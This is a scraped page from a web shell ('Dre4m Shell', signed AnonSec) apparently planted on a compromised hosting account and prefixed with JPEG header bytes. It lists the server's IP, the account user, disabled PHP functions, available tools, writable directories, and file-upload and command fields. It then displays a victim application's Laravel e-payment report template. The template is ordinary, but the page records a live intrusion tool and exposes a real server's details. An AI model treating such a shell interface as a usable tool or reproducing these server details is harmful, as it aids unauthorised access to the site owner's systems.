ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.219.159.197
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/fundscopied/resources/views/epayment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/fundscopied/resources/views/epayment/index.blade.php
  @extends('layouts.layout')
  @section('pageTitle')
  E-payment
  @endsection
  @section('content')
  <form method="POST" action="{{ url('epayment/retrieve') }}" target="_blank">
    <div class="box-body" style ="background:#fff;">
      <div class="row">
        <div class="col-md-12"><!--1st col-->
          @if (count($errors) > 0)
          <div class="alert alert-danger alert-dismissible" role="alert">
            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
            </button>
            <strong>Error!</strong> 
            @foreach ($errors->all() as $error)
            <p>{{ $error }}</p>
            @endforeach
          </div>
          @endif
          @if(session('message'))
          <div class="alert alert-success alert-dismissible" role="alert">
            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <strong>Success!</strong> 
            {{ session('message') }}
          </div>                        
          @endif
        </div>
        {{ csrf_field() }}
        <div class="col-md-12">
         <h4 class="" style="text-transform:uppercase">Epayment Report</h4>
          <div class="row">

            <div class="col-md-6">
              <div class="form-group">
                <label>Select Court</label>
                <select name="court" id="court" class="form-control" style="font-size: 13px;">
                  <option value="">Select Court</option>
                  @foreach($courts as $court)
                  @if($court->id == session('anycourt'))
                  <option value="{{$court->id}}" selected="selected">{{$court->court_name}}</option>
                @else
                <option value="{{$court->id}}" @if(old('court') == $court->id) selected @endif>{{$court->court_name}}</option>
                @endif
                  @endforeach
                </select>
                 
              </div>
            </div>

             <div class="col-md-6">
              <div class="form-group">
                <label>Select Division</label>  
                <select name="division" id="division_" class="form-control" style="font-size: 13px;">
                <option value="">Select Division</option>
                 @foreach($courtDivisions as $divisions)
                 <option value="{{$divisions->divisionID}}" @if(old('division') == $divisions->divisionID) selected @endif>{{$divisions->division}}</option>
                 @endforeach
                </select>
               </div>
              </div>

            <div class="col-md-6">
            <div class="form-group">
              <label> Select a Month </label>
              <select name="month" id="section" class="form-control">
                <option value="">Select Month </option>
                <option value="JANUARY" @if(old('month') == 'JANUARY') selected @endif>January</option>
                <option value="FEBRUARY" @if(old('month') == 'FEBRUARY') selected @endif>February</option>
                <option value="MARCH" @if(old('month') == 'MARCH') selected @endif>March</option>
                <option value="APRIL" @if(old('month') == 'APRIL') selected @endif>April</option>
                <option value="MAY" @if(old('month') == 'MAY') selected @endif>May</option>
                <option value="JUNE" @if(old('month') == 'JUNE') selected @endif>June</option>
                <option value="JULY" @if(old('month') == 'JULY') selected @endif>July</option>
                <option value="AUGUST" @if(old('month') == 'AUGUST') selected @endif>August</option>
                <option value="SEPTEMBER" @if(old('month') == 'SEPTEMBER') selected @endif>September</option>
                <option value="OCTOBER" @if(old('month') == 'OCTOBER') selected @endif>October</option>
                <option value="NOVEMBER" @if(old('month') == 'NOVEMBER') selected @endif>November</option>
                <option value="DECEMBER" @if(old('month') == 'DECEMBER') selected @endif>December</option>
              </select>
            </div>
          </div>
          <div class="col-md-6">
            <div class="form-group">
              <label >Select a Year</label>
              <select name="year" id="section" class="form-control">
                <option value="">Select Year</option>
                @for($i=2011;$i<=2040;$i++)
                 <option value="{{$i}}" @if(old('year') == $i) selected @endif>{{$i}}</option>
                @endfor
              </select>
            </div>
          </div>
          <div class="col-md-6">
            <div class="form-group">
              <label for="bankName">BANK NAME</label>
              <select name="bankName" id="bankName_"  class="form-control">
              <option value="">Select Bank</option>
                  @foreach($allbanklist as $list)
                 <option value="{{$list->bankID}}" @if(old('bankName') == $list->bankID) selected @endif>{{$list->bank}} </option>
                 @endforeach
              </select>
            </div>
          </div>
          
          <div class="col-md-6">
            <div class="form-group">
              <label>Bank Group</label>
              <input type="text" name="bankGroup" id="bankGroup" class="form-control" value="{{old('startDate')}}" />
            </div>
          </div>
          <div class="col-md-12">
            <div class="form-group">
              <div >
                <button type="submit" class="btn btn-success btn-sm pull-right">Generate Schedule</button>
              </div>
            </div>           
          </div>
        </div>
      </div>
    </div>
  </div><!-- /.col -->
</div><!-- /.row -->
</form>
@endsection
@section('styles')
@endsection

@section('scripts')

<script src="{{asset('assets/js/jquery-ui.min.js')}}"></script>

<script type="text/javascript">

$(document).ready(function(){
 
$("#court").on('change',function(e){
   e.preventDefault();
  var id = $(this).val();
//alert(id);
  $token = $("input[name='_token']").val();
 $.ajax({
  headers: {'X-CSRF-TOKEN': $token},
  url: murl +'/session/court',
 
  type: "post",
  data: {'courtID':id},
  success: function(data){
  location.reload(true);
  //console.log(data);
  }
});

});
 });
</script>
@endsection




Anon7 - 2022
AnonSec Team